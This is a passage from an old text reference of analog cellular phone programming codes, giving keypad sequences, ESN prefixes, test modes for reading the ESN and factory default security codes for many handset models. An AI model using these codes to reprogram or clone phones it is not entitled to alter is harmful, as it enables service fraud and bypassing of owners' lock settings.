Programmer: Handset ESN Prefix DEC: 132 HEX: 84 ESN, S/N Match Required: No Handset Programming: Yes Number of Channels: 666 Programming Sequence: Power On Select NAM one or two with Sequence A or B A-OPT + DIAL + MAIN (for NAM 1) B-OPT + DIAL + SUB (for NAM 2) (Use OPT + 3 arrow keys to select functions from menu or screen) Enter Programming Mode with OPT 626 RCL Press UP(# Key) or Down(* Key) to increment Write NAM with OPT 626 STO # of digits System ID: 5 XXXXX Local Use: 1 1 MIN Option: 1 1 System Select from H/S: 1 1 Roam Inhibit: 1 0 Area Code: 3 XXX Phone Number: 7 XXX-XXXX Station Class: 2 XX Initial Page Channel: 4 0333 or 0334 Access Overload: 2 XX Preferred System: 1 0 (B) or 1 (A) Group ID: 2 XX Lock Code: 3 XXX End-to-End Signaling: 1 1 Handsfree: 1 0 or 1 Press OPT + 626 + STO to enter contents and exit program mode Horn Alert: N/A New Unlock Code: NAM System Select: OPT + SYST (Software Ke) + SCRL (Software Key) repeatedly. One of the following prompts will appear: SYS A/SYS B/SYS AB/SYS BA/HOME Press SELC (Software Key to enter selection) ------------------------------------------------------------------------------- HITACHI CR-211H & CR-2121H portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Hitachi Programmer: Handset ESN Prefix DEC: 132 HEX: 84 ESN, S/N Match Required: No Handset Programmable: Yes Number of Channels: 832 Programming Sequence: Power On Select NAM one or two with sequence A or B A-OPT + DIAL + MAIN (for NAM 1) B-OPT + DIAL + SUB (for NAM 2) (Use OPT + 3 arrow keys to select functions from menu or screen) Enter Programming Mode with OPT 626 RCL Write NAM with OPT 626 STO # of digits System ID: 5 XXXXX Local Use: 1 1 MIN Option: 1 1 System Select from H/S: 1 1 Roam Inhibit: 1 0 Phone Number: 10 XXX-XXX-XXXX Station Class: 2 XX Initial Page Channel: 4 0333 or 0334 Access Overload: 2 XX Preferred System: 1 0 (B) or 1 (A) Group ID: 2 XX Lock Code: 3 XXX End-to-End Signaling: 1 1 Handsfree: 1 0 or 1 Press OPT + 626 + STO to enter contents and exit program mode Horn Alert: N/A New Unlock Code: NAM System Select: OPT + SYST (Software Key) + SCRL (Software Key) repeatedly. One of the following prompts will appear. SYS A/SYS B/SYS AB/SYS BA/HOME Press SELC (Software Key to enter selection) ------------------------------------------------------------------------------- HITACHI CR-2110H portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Hitachi Programmer: Handset ESN Prefix DEC: 132 HEX: 84 ESN, S/N Match Required: No Programming Sequence: Power On Select a NAM (A or B): A-OPT + DIAL + MAIN, B-OPT + DIAL + SUB (use OPT _ 3 arrow keys to sel fcns from menu) Enter Programming Mode with OPT 626 RCL Press UP(# Key) or DOWN(* Key) to increment Write NAM with OPT 626 STO # of digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 System Select H/S: 1 1 Roam Inhibit: 1 0 Area Code: 3 XXX Mobile Number: 7 XXX-XXXX Station Class: 2 08 (mobile) or 14 (portable) Initial Paging Channel: 3 333 or 334 Access Overload Class: 2 XX Preferred System: 1 1 (A) or 0 (B) Group ID Format: 2 XX Unlock Code: 3 or 4 End-to-End Signaling: 1 1 Handsfree: 1 0 or 1 Horn Aler: N/A New Unlock Code: NAM System Select: OPT + SYST (software key) + SCRL (software key) repeat for system prompts. SELC (to enter selection) ------------------------------------------------------------------------------- HITACHI CR-111H transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Hitachi Programmer: Handset ESN Prefix DEC: 132 HEX: 84 ESN, S/N Match Required: No Available Channels: 832 Programming Sequence: Power On Select a NAM (A or B): A-OPT + DIAL + MAIN, B-OPT + DIAL + SUB (Use OPT + 3 arrow keys to select from menu) Enter Programming Mode with OPT 626 RCL Press Up(# Key) or Down(* Key) to increment Write NAM with OPT 626 STO # of digits System ID Format: 5 XXXXX Local Use Option: 1 1 MIN Option: 1 1 System Select H/S: 1 1 Roam Inhibit: 1 0 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 08 (mobile) or 14 (portable) Initial Paging Channel: 3 333 oe 334 Access Overload Class: 2 XX Unlock Code: 3 or 4 End-to-End Signaling: 1 1 Handsfree: 1 0 or 1 To enter data press OPT + 626 + STO Horn Alert: N/A New Unlock Code: NAM System Select: OPT + SYST (software Key) + SCRL (software key) repeat for system prompts. SELC (to enter selection) ------------------------------------------------------------------------------- HYUNDAI ------------------------------------------------------------------------------- See NOVATEL Aurora programming instructions ------------------------------------------------------------------------------- INFINITI ------------------------------------------------------------------------------- See MOTOROLA Handset programming instructions Use Handset Type SCN 2144 or SCN 2278 ------------------------------------------------------------------------------- JAGUAR (Factory Phone) ------------------------------------------------------------------------------- See PANASONIC EB 311/EB 312 ------------------------------------------------------------------------------- E.F. JOHNSON ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: E.F. Johnson Programmer: Motorola or Curtis ESN Prefix DEC: 131 HEX: 83 ESN, S/N Match Required: Yes Programmable Handset: No Available Chennels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Option Bits: Hex Address B7 B0 13 1 1 1 1 0 1 1 1 14 0 0 0 1 1 1 1 0 15 1 1 0 0 0 0 0 0 16 0 1 1 0 1 0 0 0 Description: Address 13 -- B7 One minute reminder B6 Call Timer B5 Lock Option B4 Speaker Mute B2 Local Dial Tone B1 Call in Absencce Indicator B0 Call Indicator Address 14 -- B4 Recall Accumulated Time B3 Hold Option B2 Digit Review B1 DTMF Disable Address 15 -- B7 Diagnostic Features B6 Failure Help Display Address 16 -- B6 System Select Option B5 DTMF Repertory Dialing B3 System Indicator Horn Alert: Horn Slide Switch on Handset New Unlock Code: NAM System Select: RCL + AUX + AUX, etc. This will display one of the following: A only PH-B ALL PH-B Press CLR to enter selection and exit A/B mode. ------------------------------------------------------------------------------- KENWOOD KMP F500 MOBILE and KMP H700 portable ------------------------------------------------------------------------------- Manufacturer by NEC. - KMP F500 programs and operates similar to the NEC 3800. - KMP H700 is similar to the NEC P300 Program adaptors (available from NEC or KENWOOD) are necessary to program both models. ------------------------------------------------------------------------------- LEXUS ------------------------------------------------------------------------------- See MOTOROLA Handset programming instructions. Use Handset Type SCN 2301. ------------------------------------------------------------------------------- LUXCEL LXC/LXM/LXT 450 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Shintom Programmer: Handset ESN Prefix DEC: 174 HEX: AE ESN, S/N Match Required: Yes Available Channels: 832 Stamped Model Number: 4x130511s Programming Sequence: Power On FUNC + 5 + to lock phone Enter Programming mode: FUNC + # + 626 + # + FUNC Press SEND to advance past Model #/sw vers Press SEND to advance past ESN(in Hex form) Press SEND to advance/change through parameters Write NAM: END + FUNC + END Phone will initialize in the Lock Mode # of digits Area Code: 3 XXX Mobile Number: 7 XXX-XXX-XXXX System ID Format: 5 XXXXX Access Overload Class: 2 XX Local Use Option: 1 1 MIN Option: 1 1 Unlock Code: 3 XXX (preset 123) Auto Lock: 1 0(off) 1(on) Call Restrictions Code: 3 XXX (preset 123) Call counter Reset: 2 XX Handsfree: 1 0 or 1 Horn Alert: 11 Horn Alert Shutoff Timer: 1 0-2hrs, 1-4hrs, 2-8hrs, 3-no limit Cum. Call Timer Reset: 2 XX (preset 12) Horn Alert: FUNC + 4 + Ignition Off New Unlock Code: NAM System Select: FUNC + 7 (A then B) repeat to exit FUNC + 7 (B then A) repeat to exit. ------------------------------------------------------------------------------- LUXCEL LXC/LXM/LXT 600 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Goldstar Programmer: Handset ESN Prefix DEC: 141 HEX: 8D ESN, S/N Match Required: Yes Available Channels: 832 Stamped Model Number: GM5000 or GT5000 Programming Sequence: Power On FUNC + 4 + * (to select NAM) Enter Programming mode: FCN + 99 + * (display "enter code") + 1234567890 + MEM (enter within 30 secs) Press MEM after entering each parameter to store Scroll Up or Down to view next parameter CLR key to exit without changes saved # of digits Mobile Number: 10 XXX-XXX-XXXX + MEM System ID Format: 5 XXXXX + MEM Initial Paging Channel: 3 333 or 334 + MEM Access Overload Class: 2 XX + MEM Unlock Code: 3 XXX(preset 123) Security Code: 6 XXXXXX + MEM Theft alarm dis: 4 XXXX + MEM Preferred System: 1 0(B) or 1(A) + MEM Handsfree: 1 0(disable) or 1(enable) + MEM Local Use Option: 1 1 + MEM MIN Option: 1 1 + MEM Horn Alert: 1 1 + MEM Optional Speaker: 1 1 + MEM Press MEM to save, CLR to exit Horn Alert: FCN + 1 + Vol Up (Scroll to "Horn Alert") + * (toggle selection) New Unlock Code: NAM System Select: FCN + 2 + 6 digit security code + MEM + Vol Up or Down (to scroll) ("System select") will display + * (to toggle) Press MEM (to store) Press CLR (to exit) ------------------------------------------------------------------------------- MEI CT2000 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: MEI Programmer: Handset ESN Prefix DEC: 167 HEX: A7 ESN, S/N Match Required: Yes Stamped Model Number: CT 3000 Number of Channels: 832 Programming Sequence: Power On Enter program sequence: 12358 + * + 0 + #980 + # Press 1 to enter program mode Select NAM 1 or 2 Enter information for each step then press * to increment Press END to write NAM information or select NAM 2 and repeat progress to program 2nd # of digits System ID: 5 XXXXX + * Local Use: 1 1 + * MIN Option: 1 1 + * Mobile Number: 10 XXX-XXX-XXXX + * Station Class: 2 08 + * Initial Page Channel: 3 333 or 334 + * Access Overload: 2 XX + * Preferred System: 1 0 (B) or 1 (A) Group ID: 2 XX + * Lock Code: 3 XXX + * End-to-End Signalling: 1 1 + * Repertory Option: 1 1 + * Horn Alert: 1 1 + * Handsfree: 1 1 + * Sec Code: 3 XXX + * Press END to write NAM information Horn Alert: FCN + 9 New Unlock Code: NAM System Select: FCN + 0 + RCL + RCL + RCL, etc... (Until one of the following prompts appears) Standard AB or BA Inverse (Alternate BA or AB) A Only B Only Home Press STO to enter selection + CLR to exit. ------------------------------------------------------------------------------- MEI CT3000 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: MEI Programmer: Handset ESN Prefix DEC: 167 HEX: A7 ESN, S/N Match Required: Yes Stamped Model Number: CT 3000 Number of Channels: 832 Programming Sequence: Power On Enter program sequence: 12358 + * + 0 + # + 980 + # (must be inputed within 10 seconds) Press 1 to enter programming mode Select NAM 1 or 2 Enter infomation for each step then press * to increment Press END to write NAM infomation or select NAM 2 and repeat progress to program 2nd # of digits System ID: 5 XXXXX + * Local Use: 1 1 + * MIN Option: 1 1 + * Mobile Number: 10 XXX-XXX-XXXX + * Station Class: 2 08 + * Initial Page Channel: 3 333 or 334 + * Access Overload: 2 XX + * Preferred System: 1 0 (B) or 1 (A) Group ID: 2 XX + * Lock Code: 3 XXX + * End-to-End Signalling: 1 1 + * Repertory Option: 1 1 + * Horn Alert: 1 1 + * Handsfree: 1 1 + * Sec Code: 1 1 + * Press END to write NAM information Horn Alert: FCN + 9 New Unlock Code: NAM System Select: FCN + 0 + RCL + RCL + RCL, etc... (Until one of the following prompts appears) Standard (AB or BA) Inverse Alternate (BA or AB) A Only B Olny Home Press STO to enter selection + CLR to exit. ------------------------------------------------------------------------------- MEI HT5000 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: MEI Programmer: Keypad ESN Prefix DEC: 167 HEX: A7 ESN, S/N Match Required: Yes Stamped Model Number: HT 5000 Number of Channels: 832 Programming Sequence: Fully charges battery on phone Power On Connect program adapter to bottom of phone or jumper pin #1 and pin #5 while pressing PWR button Enter individual parameter then press RCL to store data and increment SND or MUT may be pressed to scroll program parameters Press END to write NAM information # of digits System Select Feature: 1 1 + RCL Low Battery Alarm: 1 1 + RCL Memory Locations: 1 0=10 or 1=100 + RCL Enable Roaming: 1 1 + RCL End-to-End Signalling: 1 1 + RCL Horn Alert: 1 1 + RCL Repertory Option: 1 1 + RCL Music on Mute: 1 1 + RCL Enable Timer Reset: 1 1 + RCL Status Meter: 1 1 + RCL Not Used: 1 0 + RCL Resettable Timer: 1 0 + RCL Restrict own Num Display: 1 0 + RCL Not Used: 1 0 + RCL Not Used: 1 0 + RCL Not used: 1 0 + RCL Lock Select: 1 0=Total lock, 1=Outgoing Lock, 2=Partial Lock + RCL Unlock Code: 1-10 XXX + RCL Backlight Timer: 256 10 + RCL Mobile Number: 10 XXX-XXX-XXXX + RCL System ID: 5 XXXXX + RCL Initial Paging Channel: 3 333 or 334 + RCL Station Class: 2 10 + RCL Preferred System: 1 1(A) or 0(B) + RCL MIN Option: 1 X + RCL Access Overload: 2 XX + RCL Group ID: 2 XX + RCL Local Use: 1 1 + RCL The program sequence will now repeat the last 8 steps for a second NAM. If you wish to program only one NAM, press END to exit. Once end is pressed, wait 5 seconds, for the phone to complete the program process. After the programming is complete, power phone OFF and remove the program adapter. Multiple NAM Select: RCL + # + 6 (repeatedly until new number and correct system select appears) New Unlock Code: NAM System Select: RCL + # + 6 + 6 + 6 + 6 etc... (One of the following prompts will display) Standard (AB or BA) Inverted (Alternate BA or AB) A only B only Home Press CLR to exit. ------------------------------------------------------------------------------- MESA ------------------------------------------------------------------------------- See DIAMONDTEL ------------------------------------------------------------------------------- MGA TELEPHONES ------------------------------------------------------------------------------- MGA 100 - See DIAMONDTEL MESA 95 MGA 200 - See DIAMONDTEL MESA 90X ------------------------------------------------------------------------------- MITSUBISHI 500, 555, 560 and 600 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: Yes Number of Channels: 666 Programming Sequence: Power On Press and hold STO while inputting 5474432 Enter data then press SND to increment Press END to write NAM information # of digits Mobile Number: 10 XXX-XXX-XXXX + SND Security Code: 3 XXX + SND System ID: 5 XXXXX + SND Local Use: 1 1 + SND MIN Option: 1 1 + SND Initial Paging Channel: 3 333 or 334 + SND Access Overload: 2 XX + SND Preferred System: 1 0(B) or 1(A) + SND Group ID: 2 XX + SND End-to-End Signalling: 1 1 + SND Handsfree: 1 0 (disable) or 1 (Enable) + SND Roam Inhibit: 1 0 (disable) or 1 (Enable) + SND A/B Select: 1 0 (disable) or 1 (Enable) + SND Dual Handset: 2 00 single set + SND 01 dual handset + SND Long Distance Inhibit: 2 00 standard + SND 08 inhibit + SND The phone alson has a NAM socket. Be sure to remove standard NAM, if applicable, before attempting to program phone from the handset. Horn Alert: FCN + 5 5 can be repeatedly pressed to exted horn alert duration. If "Horn" blinks then call in absence is activated. New Unlock Code: FCN + 6 + 3 digit security code (NAM) + new 3 digit unlock code. System Select: FCN + 0 + 0 + 0 etc... (until one of the following prompts appears) Pref A or Pref B Pref B or Pref A H only Only A or Only B Only B or Only A Press CLR to exit. ------------------------------------------------------------------------------- MITSUBISHI 700 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Stamped Model Number: MT392FOR6A Number of Channels: 666 Programming Sequence: Power On Enter Sequence 3111917 while holding CLR (within 10 seconds of power on) SEND button Enters data and increments END button writes data in NAM # of digits Mobile Number: 10 XXX-XXX-XXXX + SEND Security Code: 4 XXXX + SEND System ID: 5 XXXXX + SEND Local Use: 1 1 + SEND MIN Option: 1 1 + SEND Initial Page Channel: 3 333 or 334 + SEND Access Overload: 2 XX + SEND Preferred System: 1 0(B) or 1(A) + SEND Group ID: 2 XX + SEND End-to-End Signalling: 1 1 + SEND Roam Inhibit: 1 0 or 1 + SEND Enable A/B Option: 1 0 or 1 + SEND Auto Lock: 1 0 or 1 + SEND Enable Booster Option: 1 0 or 1 + SEND Press END to write NAM information New Unlock Code: FCN + STO + (4 digit Security Code) + New 3 digit Unlock Code + CLR + FCN + 1 + X + CLR (to exit) X=0 Standard (AB or BA) X=1 Alternate (BA or AB) X=2 Home only X=3 Preferred only (A only or B only) X=4 Non-Pref Only (B only or A only) ------------------------------------------------------------------------------- MITSUBISHI 800 transportable & mobile ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Number of Channels: 832 Programming Sequence: Power On Depress and hold STO while nputting 5474432 (must be input within 10 seconds) Enter information for each step then press SND to increment Press END to write NAM information # of digits Dual Phone Number: 1 0 (1 number) or 1 (2 number) Mobile Number: 10 XXX-XXX-XXXX System ID: 5 XXXXX Local Use: 1 1 MIN Option: 1 1 Initial Page Channel: 4 0333 or 0334 Access Overload: 2 XX Preferred System: 1 0(B) or 1(A) Group ID: 2 XX (If 2 Numbers were set, repeat the above functions once more) Security Code: 4 XXXX End-to-End Signalling: 1 1 Discontinuous Transmission: 1 0(disable) or 1(enable) Handsfree: 1 0(disable) or 1(enable) Roam Inhibit: 1 0 Continuous DTMF: 1 0(disable) or 1(enable) System Select: 1 1 Dual Handset: 1 0(disable) or 1(enable) Long Distance Inhibit: 1 0(disable) or 1(enable) Never Power Off or Disconnect power while phone is in programming mode. Display ESN: Enter Test Mode Power On Press and hold STO while inputting 5278764 Enter 189 + SND (to read ESN) Power off to exit Horn Alert: FCN + 5 pressing 5 repeatedly will increase horn alert duration. If "Horn" stays illuminated, phone is in horn alert mode. If "Horn" blinks, the call in absence indicator is activated. New Unlock Code: FCN + 6 + 4 digit security code (NAM) + following prompts appears Pref A or Pref B, Standard (AB or BA) Pref B or Pref A, Alternate (BA or AB) Home only Only A or Only B Only A or Only A Press CLR to exit. ------------------------------------------------------------------------------- MITSUBISHI 900 & 3000 portables ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Available Channels: 832 Programming Sequence: Power On Depress and hold END while inputting 6972814 (must be input within 10 seconds) Enter information for each step then press SEND to increment Press END to write NAM information # of Digits Dual Number: 1 0(1 NAM) or 1(2 NAM) + SEND Mobile Number: 10 XXX-XXX-XXXX + SEND System ID: 5 XXXXX + SEND Local Use: 1 1 + SEND MIN Option: 1 1 + SEND Initial Page Channel: 4 0333 or 0334 + SEND Access Overload: 2 XX + SEND Preferred System: 1 0(B) or 1(A) + SEND Group ID: 2 XX + SEND Roam Inhibit: 1 0 + SEND VOX: 1 0(disable) or 1(enable) + SEND (if you entered 2 NAMs repeat the above steps once more) Security Code: 4 XXXX + SEND (900 only) End-to-End Signalling: 1 1 + SEND Continuous DTMF: 1 0(disable) or 1(enable) + SEND Auto Lock: 1 0(disable) or 1(enable) + SEND Booster: 1 0 + SEND (900 only) Audible Timer: 1 0(disable) or 1(enable) + SEND Use a charged battery for programming. Do NOT power down or disconnect power while in the programming mode. Display ESN: Power On Hold END key while inputting 0944635 (within 10 secs) 18 + SEND (to display ESN) Power Off (to exit) New Unlock Code: FCN + 7 + 4 digit security code (NAM) + New 3 digit unlock code + CLR (900 only) For 3000: FCN + 7 + 4 digit security code (NAM) + new 3 digit unlock code + STO System Select: FCN + 1 + X X=0 Standard (AB or BA) X=1 Alternate (BA or AB) X=2 Home X=3 Pref Only (A only or B only) X=4 Non-Pref Only (B only/A only) Press CLR to exit ------------------------------------------------------------------------------- MITSUBISHI 1500 transportable & mobile ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mitsubishi Programmer: Handset ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Stamped Model Number: 1500+Serial Number Number of Channels: 832 Programming Sequence: Power On Depress and Hold CLR while inputting 5474432 (must be within 10 seconds) Enter information for each step then press SND to increment Press END to write NAM information # of Digits Dual Phone Number: 1 0 (1 NAM) or 1 (2 NAMs) + SND Mobile Number: 10 XXX-XXX-XXXX + SND System ID: 5 XXXXX + SND Local Use: 1 1 + SND MIN Option: 1 1 + SND Initial Page Channel: 4 0333 or 0334 + SND Access Overload: 2 XX + SND Group ID: 2 XX + SND (If you selected 2 NAMs you will repeat the above steps once more) Security Code: 4 XXXX + SND Discontinuous Transmission: 1 0(disable) or 1(enable) + SND Roam Inhibit: 1 0 + SND Continuous DTMF: 1 0(disable) or 1(enable) + SND System Select: 1 1 + SND Disable One Tel # display: 1 0 + SND SID Lockout (Invalid SID): 5 XXXXX + SND Dual Handset: 1 0(disable) or 1(enable) + SND RJ 11 Option: 1 0(disable) or 1(enable) + SND Press END key to enter program info and exit program mode NEVER Power Off or Disconnect power while phone is in programming mode Display ESN: Enter Test Mode Power On Press and hold CLR while inputting 5287864 Enter 18 + SND(to read ESN) Power Off to exit. Horn Alert: FCN + 3 + 8 New Unlock Code: FCN + 7 + 4 digit security code + New 3 digit unlock code + STO System Select: FCN + 1 + X X=0 Prefer A (AB) X=1 Prefer B (BA) X=2 Home X=3 A Only X=4 B Only Press CLR to exit. ------------------------------------------------------------------------------- MITSUBISHI 301, 401, and 450 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Mitsubishi Programmer: Curtis or Bytek ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 MIN 1: XXX Lock: XXX MIN 2: XXX System ID Format: XXXX Horn Alert Option: 1 Handsfree Option: 1 (if equipped) End-to-End Signalling: 1 Repertory Option: 1 Group ID Format: XX Access Overload Class: XX Station Class: 0000 Local Use Option: 1 Initial Paging Channel: 333 or 334 Preferred System: 1(A) or 0(B) ------------------------------------------------------------------------------- MITSUBISHI 460 CRYSTAL ONE ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Toshiba Programmer: Motorola, Curtis or Bytek ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Manufacturer Options: Hex Address B7 B0 13 0 0 0 0 0 0 1 1 14 0 0 0 0 0 0 0 0 15 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0 0 0 18 0 0 0 0 0 0 0 0 19 0 0 0 0 0 0 0 0 1A 0 0 0 0 0 0 0 0 1B X X X X X X X X 1C X X X X 0 0 0 0 Description: Address 13 - B0 A/B Switch - B1 Call Timer Address 1B - B4-B7 Timer Clear Code 1st digit (Binary) B0-B3 Timer Clear Code 2nd digit (Binary) Address 1C - B4-B7 Call Timer Code 3rd digit (Binary) Horn Alert: FCN + 6 + Turn Ignition Off New Unlock Code: NAM System Select: FCN + 0 Toggles between (AB & BA) ------------------------------------------------------------------------------- MOBIRA 300 SERIES, ME 57 AND ME 57A Transportable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Mobira Programmer: Handset, Service Handset or Curtis ESN Prefix DEC: 156 HEX: 96 ESN, S/N Match Required: Yes Stamped Model Number: ME57A Number of Channels: 666 Programming Sequence: Enter Local Mode with the following sequence: * + 21057 + # + XXXXX + * (XXXXX = 12345 ; from factory) else XXXXX = Current Security Code. (Local Mode can also be entered with a service handset using the sequence: 01 + #) While noise will come from handset Enter Programming Mode with the following sequence: 48# Press each step number, desired parameter then * to enter data Once data has been entered, press * to exit Program Mode and return to Local Mode To exit Local Mode, press 02# or power Off ESN can be read in Local mode by pressing 44# ESN will display in decimal. Press * to convert ESN to hexidecimal # of Digits System ID: 5 XXXXX + * MIN Option: 1 1 + * Local Use: 1 1 + * Mobile Number: 10 XXX-XXX-XXXX + * Station Class: 2 00 + * Initial Page Channel: 3 333 or 334 + * Access Overload: 2 XX + * Preferred System: 1 0 (B) or 1(A) + * Group ID: 2 XX + * Security Code: 5 XXXXX + * NAM Reading Sequence: Enter Local Mode as listed above Press 49# to enter NAM reading Mode To read programmed values, enter step number then press * To Exiti NAM Reading Mode, press * and phone will return to Local Mode To exit Local Mode press 02# or Power Off New Unlock code: SEL + LCK + (5 digit Security Code) Current 4 digit Unlock code will display - Preset 1234 + new 4 digit Unlock Code + SEL System Select: SEL + 1 + 1 + 1 etc (To scroll Choices) + SEL (To Exit) A Only B Only S Standard AB or BA ------------------------------------------------------------------------------- MOBIRA 400 SERIES (Trans) & 500 SERIES (Port) ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: MOBIRA Programmer: Handset ESN Prefix DEC: 156 HEX: 9C ESN, S/N Match Required: No Handset Programmable: Yes, IF 5 digit Security Code is known Number of Channels: 666 or 832 Programming Sequence: Verify if 400 series phone has dual NAM by the commands: MENU, FCN, NEXT, OK, FCN, NEXT, OK 5, OK Phone will display: TPA-4 for single NAM or TPA-4D for dual Press FCN, CLR Programming Power On Press MENU, FCN, NEXT, OK, FCN, NEXT, OK An asterisk (*) should appear in display (if not, Press FCN, CLR, and repeat above listed keys) Enter Access Code *21057#.XXXXX.OK XXXXX = 12345 (from factory) or currect code Verify display "HOME SYS" for single NAM phones or "SELECT USED NAM" for dual NAM Use NEXT key to increment or FCN.NEXT to decrement thru parameters Press OK key to view current value of parameter Store parameter value by pressing OK Wait for value to disappear and parameter name to reappear To program 2nd number in Dual NAM phone, return to "SELECT USED NAM" Enable 2nd NAM by pressing OK Program thru Group ID parameter for 2nd NAM To write NAM information, press FCN.CLR,Power Off, Power On # of Digits NAM Selection: None Primary/Optional 2nd NAM: None Disable/Enable System ID: 5 XXXXX MIN Option: 1 0 or 1 Local Use: 1 0 or 1 Mobile Number: 10 XXX-XXX-XXXX Station Class: 2 XX Initial Paging Channel: 4 XXXX Access Overload: 2 XX Preferred System: -- A or B Group ID: 2 XX Security Code: 5 XXXXX Mfg Control Date: Preset at Factory Install Date: 6 XX/XX/XX Horn Alert: N/A New Unlock Code: Menu + FCN + NEXT + OK + NEXT + OK + NEXT + OK (Continue pressing NEXT + OK until UNLOCK CODE appears) Upon pressing OK, SECURITY ID will appear. Enter 5 digit security code (NAM) and current unlock code will appear. Enter new 4 digit unlock code. System Select: FCN + 1 then NEXT to change or OK to accept. The selection will appear as follows: BA or AB Preferred only Non-Preferred Only ------------------------------------------------------------------------------- MURATA CT50 & MCT 200 Portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: MURATA Programmer: Keypad ESN Prefix DEC: 144 HEX: 90 ESN, S/N Match Required: No Stamped Model Number: CT50 or MCT 200 Number of Channels: 832 Programming Sequence: Power Off Power On while holding Enter Program Code 314159 Software version will display Press STO to advance to next step (System ID) Repeatedly press 0 ("Clr", "Set" or "Pass" will display) Repeatedly press 0 until "Set" appears Press STO + Enter System ID (digit+#+digit+#+digit+ # etc..) # of Digits System ID: 5 XXXXX + # Mobile Number: 10 XXX-XXX-XXXX + # Security Code: 6 XXXXXX + # New Unlock Code: FCN + 53 + 6 digit Security Code + 1 + STO + New 3 digit Unlock Code System Select: FCN + 12 + 0 + 0 + 0 + 0 etc. (one of the following will display) Standard AB or BA Home A Only B Only Press STO to enter selection =============================================================================== _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ ------------------------------------------------------------------------------- MOTOROLA HANDSET PROGRAMMING ------------------------------------------------------------------------------- _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ =============================================================================== THE SACRED THREE STEPS FOR PROGRAMMING MOTOROLA PHONES Step 1: Determine programming sequence from the following list. ~~~~~~~ This sequence will allow access to programming mode. Handset or Model Programming Sellar Portable Type Number Sequence Code ------------------------------------------------------------------------------- SCN 2004 4500L 3 A SCN 2005 4500XL 3 A SCN 2007 3000 6 B SCN 2022 6 SCN 2023 6800XL 6 A SCN 2033 5 SCN 2034 6 SCN 2042 Credit Card N/A SCN 2043 MC200,MODAR 4 4 C SCN 2056 1900,2200,2900 SCN 2080 BLAUPUNKT 6 SCN 2081 5 SCN 2083 6800XL 6 A SCN 2084 2 SCN 2085 6 SCN 2090 MC500 6 C SCN 2094 TOYOTA 6 SCN 2104 AUDI 6 SCN 2115 6 SCN 2119 4500XL 3 SCN 2120 5000 6 B SCN 2124 2600,AC320 6 B,E SCN 2126 4 SCN 2127 4 SCN 2128 4 SCN 2129 DYNA-GRAY 4 SCN 2133 6000X 1 SCN 2134 6 SCN 2144 INFINITI 5 SCN 2165 4 SCN 2166 4 SCN 2168 4 SCN 2174 3 SCN 2175 4 SCN 2180 4 SCN 2194 MC300 4 C SCN 2195 6 SCN 2200 PULSAR 4 SCN 2201 PULSAR 4 SCN 2202 PULSAR 4 SCN 2204 MC500 4 SCN 2208 SEARS 4 SCN 2209 MONTGOMERYWORDS 4 SCN 2210 3 SCN 2222 ACURA 6 SCN 2223 ACURA FS 6 SCN 2238 GM 6 SCN 2251 DYNA-GRAY 6 SCN 2252 4 SCN 2259 TRACER PULSAR 4 SCN 2260 PCC 4 SCN 2278 INFINITI 5 SCN 2282 PIONEER 6 SCN 2283 PIONEER 6 SCN 2295 6 SCN 2301 LEXUS 6 SCN 2329 6 SCN 2330 AC 250 6 E SLN 2020 6000X 1 A SLN 2121 1 SLN 2025 2000X 4 B T180B NAUTILUS-bk 4 T180W NAUTILUS-wt 4 TLN 2659 6000X 1 B TLN 2674 4000C/5000 2 B/C TLN 2724 1 TLN 2726 2 TLN 2733 6000 2 B TLN 2734 2 TLN 2777 2000X 4 B TLN 2867 1 TLN 2879 2 UD71419 ROLLS ROYCE 6 1632570 GM 2 1644364 GM 2 1648752 GM 2 1648764 GM 2 